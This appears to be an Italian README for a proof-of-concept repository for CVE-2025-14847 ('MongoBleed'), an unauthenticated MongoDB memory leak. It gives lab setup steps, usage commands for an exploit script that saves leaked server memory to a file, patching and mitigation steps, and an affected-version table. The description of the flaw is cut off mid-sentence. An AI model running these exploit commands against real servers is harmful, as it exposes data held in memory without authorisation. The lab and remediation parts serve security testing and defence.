
CVE-2025-14847 MongoBleed - PoC della vulnerabilità di perdita di memoria di MongoDB
👨💻 Autore: Furkan KAYAPINAR (@FurkanKAYAPINAR)
⚠️ SOLO A SCOPO EDUCATIVO
Ambiente di laboratorio e script di exploit per la critica vulnerabilità di perdita di memoria non autenticata in MongoDB Server.
CVE-2025-14847 (MongoBleed) è una vulnerabilità critica di perdita di memoria non autenticata nella gestione della compressione zlib di MongoDB Server.
La vulnerabilità risiede in message_compressor_zlib.cpp. Durante l'elaborazione dei messaggi OP_COMPRESSED:
uncompressedSize dichiarataI dati divulgati possono includere:
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Create virtual environment
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# venv\Scripts\activate # Windows
# Install dependencies
pip install -r requirements.txt
Avvia un'istanza vulnerabile di MongoDB per i test:
cd lab
# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d
# Verify it's running
docker-compose ps
# Load sample data (optional)
./setup.sh load-data
# Stop lab
docker-compose down
# Single target
python exploit/mongobleed.py -u 127.0.0.1
# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017
# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin
# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20
# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q
# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd
# Or in mongod.conf
net:
compression:
compressors: snappy,zstd
python remediation/verify_fix.py --target 127.0.0.1 --port 27017
🚨 AVVERTENZA
Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.
- L'accesso non autorizzato a sistemi informatici è illegale
- Sei l'unico responsabile delle tue azioni
- Gli autori non si assumono alcuna responsabilità per un uso improprio
Usando questo strumento, accetti di avere la corretta autorizzazione per testare i sistemi target.
I contributi sono benvenuti! Si prega di leggere prima CONTRIBUTING.md.
Questo progetto è concesso in licenza sotto la licenza MIT - vedi file LICENSE.
| Attributo | Valore |
|---|
| CVE ID | CVE-2025-14847 |
| Punteggio CVSS | 8.7 (Alto) |
| Vettore di attacco | Rete |
| Autenticazione | Nessuna richiesta |
| Data di divulgazione | 19 dicembre 2025 |
| Intervallo di versioni | Versione corretta |
|---|
| 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.0 - 7.0.26 | 7.0.28 |
| 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.0 - 4.4.29 | 4.4.30 |
| Tutte 4.2, 4.0, 3.6 | EOL - Aggiornare immediatamente |